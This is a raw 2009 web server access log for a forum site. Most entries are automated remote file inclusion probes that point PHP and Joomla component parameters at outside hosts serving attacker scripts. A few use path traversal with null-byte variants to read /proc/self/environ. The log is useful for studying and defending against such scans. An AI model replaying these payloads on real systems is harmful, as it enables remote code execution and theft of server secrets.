110.45.144.33 - - [28/Jun/2009:22:05:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:05:24 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:05:24 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:05:24 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:05:30 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:05:30 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:05:31 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:05:40 -0700] "GET /logs/access_090105.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:43 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:43 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:43 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:45 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:45 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:45 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.0" 200 918 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.0" 200 5074 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:07:10 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:07:10 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:07:10 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:07:38 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:08:35 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:08:35 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:08:35 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:08:41 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:08:41 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:08:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:08:41 -0700] "GET /logs/access_090105.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:19 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:19 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:38 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:09:38 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:09:47 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:09:47 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:09:47 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:09:47 -0700] "GET /logs/access_090105.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:10:14 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:10:19 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:10:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:10:19 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:10:27 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:10:32 -0700] "GET /logs/access_090105.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:11:10 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [28/Jun/2009:22:11:24 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
119.93.90.155 - - [28/Jun/2009:22:11:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
119.93.90.155 - - [28/Jun/2009:22:11:46 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
119.93.90.155 - - [28/Jun/2009:22:11:46 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:25 -0700] "GET /logs/access.log//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:25 -0700] "GET /?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 934 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:25 -0700] "GET /logs//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 5090 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:25 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:25 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:26 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:26 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:26 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 934 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:26 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:27 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 934 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:27 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5090 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:22:12:27 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5090 "-" "XXXXXX" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:22:12:34 -0700] "GET /logs/access_090330.log/xGB.php?act=admin&do=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:22:12:34 -0700] "GET /xGB.php?act=admin&do=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:22:12:34 -0700] "GET /logs/xGB.php?act=admin&do=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:14:43 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:14:43 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:14:43 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:14:51 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:37 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:39 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:16:44 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:58 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:58 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:22:16:58 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:17:20 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:17:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:17:31 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:22:17:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:17:31 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
151.1.219.156 - - [28/Jun/2009:22:17:31 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.234.21.178 - - [28/Jun/2009:22:17:34 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
